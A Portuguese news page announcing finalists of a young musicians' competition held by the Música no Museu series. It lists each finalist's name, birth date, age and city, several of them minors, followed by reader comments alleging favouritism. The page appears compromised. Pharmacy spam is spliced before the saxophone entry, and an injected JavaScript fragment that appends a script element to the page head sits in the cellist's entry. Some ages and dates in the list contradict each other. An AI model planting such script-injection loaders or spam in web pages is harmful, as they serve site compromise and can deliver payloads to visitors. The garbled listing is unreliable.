Notícia

IV Concurso Jovens Músicos – Música no Museu

Desde o início de Música no Museu, e aí já se passam mais de 13 anos, oferecemos espaços aos jovens músicos.

Trata-se de uma filosofia que não se limita apenas a promover apresentações, mas dinamizar e expandir as atividades musicais a outros níveis. Se não somos pioneiros, somos, sim, constantes nesta prática e, talvez, a única série que mescla, quase que em igualdade de condições, jovens e nomes de expressão mas, claro, dando-lhes o verdadeiro valor e hierarquia. Só em 2008, realizamos 503 concertos. Em 2009, foram 532 – um recorde – e cerca de 30% foram destinados a estudantes e músicos recém-formados, assim como em 2010 com 502 concertos realizados. Em 2011 serão mais de 400.

Para os jovens que almejam uma carreira profissional no campo da música erudita, os concursos se apresentam como um dos meios mais eficazes para seu desenvolvimento artístico. Constituem excelente motivação para que se entusiasmem com o trabalho e com a prática da performance, fator imprescindível para seu crescimento. Considera-se, ainda, que, com a possibilidade de um reconhecimento público, isso possa gerar para eles conquistas de novas posições no cenário artístico nacional ou mesmo internacional.

O IV Concurso Jovens Músicos – Música no Museu é uma iniciativa que tem por objetivo incentivar e promover oportunidades para estes promissores músicos, um verdadeiro investimento cujo resultado poderá ser a revelação de novos talentos. E continuamos com bons apoios, assegurando-se uma bolsa de estudos em uma centenária universidade americana, a JAMES MADISON UNIVERSITY, o que dá ao concurso uma dimensão internacional.

 

Com muita dificuldade ante a qualidade dos concorrentes, a Comissão Organizadora do IV Concurso Jovens Musicos-Musica no Museu selecionou 22 (ao invés de 21 das últimas versões) para as provas finais do referido Concurso. A semifinal e final serão realizadas nos dias 17 e 18 de dezembro a partir das 9 horas na Escola de Musica da UFRJ (Rua do Passeio no. 98- Lapa). Os candidatos serão agrupados por instrumentos e chamados na ordem alfabética abaixo.

Como existem duas situações, haverá uma distinção com relação aos que concorrerão à Bolsa de Mestrado/Doutorado da James Madison University, que inclusive estará representada no júri final, como nas versões anteriores, composto por nomes da maior expressão no panorama da musica clássica brasileira.

Desta forma, os candidatos interessados em concorrer à bolsa de estudos para Mestrado ou Doutorado pela James Madison University deverão estar disponíveis um dia antes do início do concurso para uma entrevista em inglês com o representante da universidade. Para agendar a entrevista, mande um email para o Dr. Paulo Steinberg (paulosteinberg@gmail.com).

Boa sorte a todos.

Sergio da Costa e Silva- Diretor de Musica no Museu e Presidente da Comissão Organizadora.

 

RELAÇÃO DE APROVADOS

Clarineta

– Yuri Laurent da S. Pereira
Data de Nascimento: 14/01/1994
Idade: 17 anos
Cidade: Belém – Pará

 

Flauta

– Paula Cristina Cabral Martins
Data de Nascimento: 09/01/1987
Idade: 24 anos
Cidade: Rio de Janeiro/ RJ

 

Flauta Transversa

– Bianca barroso Magro de Menezes
Data de Nascimento:  11/06//1993
Idade: 18 anos
Cidade: Belém-Pará

 

Harpa

– Gustavo Beaklini
Data de Nascimento:  02/01/1986
Idade: 25 anos
Cidade: Tucson/ AZ

 

Oboé

– Israel Silas Muniz
Data de Nascimento: 22/11/83
Idade: 28 anos
Cidade: Belo Horizonte / Minas Gerais.

 

Percussão

– Leonardo Henrique Miranda de Paula
Data de Nascimento: 16/03/1988
Idade: 23 anos
Cidade – Vitória

– Rubens José de Oliveira Junior
Data de Nascimento: 29/03/1988
Idade: 23 anos
Cidade: São Paulo SP

 

Piano

– Camila Cursio Brioli
Data de nascimento: 09/07/9
Idade: 20 anos
Cidade: São Paulo SP

– Fernando Henrique de Oliveira
Data de Nascimento: 23/01/1989
Idade: 22 anos
Cidade: Ribeirão Preto –  SP

– Patrick Marques Rodrigues
Data de Nascimento: 23/08/1993
Idade: 18 anos
Cidade: Belém – PA

– Rayana Ribeiro Cardoso
Data de Nascimento: 02/10/1986
Idade: 25 anos
Cidade: Goiânia – Goiás.

– Verena Benchimol Abufaiad
Data de Nascimento: 07/09/1993
Idade: 25 anos
Cidade: Belém – Pará

– Vinicius de Lima Ribeiro da Silva (Vinicius Dias)
Data de Nascimento: 15/04/1990
Idade: 21 anos
Cidade: Niterói – RJ

 

doxycycline 100mg for dogs canada Saxofone

– Michel  Nirenberg
Data de Nascimento: 10/07/1989
Idade: 22 anos
Cidade: Rio de Janeiro

 

Violão

– André Vicente Priedols e Souza
Data de Nascimento: 01/04/1986
Idade: 25 anos
Cidade: Vinhedo – SP

– Francisco Camloski Luz
Data de Nascimento: 26/09/1992
Idade : 19 anos
Cidade: Curitiba – Paraná

– João Wilson Sobral Santos
Data de Nascimento: 15/08/1984
Idade: 27 anos
Cidade: Rio de Janeiro – RJ

– Marcus Vinicius Rodrigues Toscano
Data de Nascimento: 13/07/1984
Idade: 27 anos
Cidade: São Paulo – SP

– Nícolas  Custodio Porto  da  Silva
Data de Nascimento: 22/06/1997
Idade: 14 anos
Cidade: Maceió – AL.
– Sérgio Vitar de Souza Ribeiro
Data de Nascimento: 25/08/1987
Idade: 24 anos
Cidade: Nova Iguaçu – RJ

 

Violino

– Ayrton Coelho Pisco
Data de Nascimento: 26/04/1995
Idade : 16 anos
Cidade: Brasília – DF

 

Violoncelo

– Gabrielle Yasmim Costa de Oliveira
Data de Nascimento: 26/05/1992
Idade: 19 anos
Cidade: Belém – Parávar d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);

3 Comments

  1. Como jovem, só posso parabenizar os seus organizadores que dão oportunidades em um mundo tão competititivo. Todas as iniciativas que se voltam para a abertura de alternativas para o mercado de trabalho devem ser estimuladas. E aquelas voltadas aos jovens devem ser multiplicadas.
    Como entrar em contato com este projeto Musica no Museu?

  2. Mãe de uma das candidatas. Conheço pouco de música. No entanto, sei o quanto o Movimento Jovem de Música vem crescendo no Brasil. A democratização da música clássica no Brasil é algo fantástico. Tenho duas considerações a serem feitas em relação a este Concurso.
    a) A Comissão deveria pensar em premiações por segmento /instrumental;
    b) O retorno deveria ser mais transparente.
    Gostaríamos que os critérios de escolha ou não escolha de cada candidato fossem publicado, como foram publicados os curriculos dos juízes. Existia um regulamento e ele não foi cumprido. Cumprimentos e afagos e/ou conhecimento de candidatos ou afins, de modo que pode ter influenciado as escolhas.

  3. Entendo bem; sou mãe de dois jovens alunos musicistas, violino e cello e sei bem o que é “influência” nas escolhas de candidatos participantes de concursos. Infelizmente, temos que nos conformar.

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.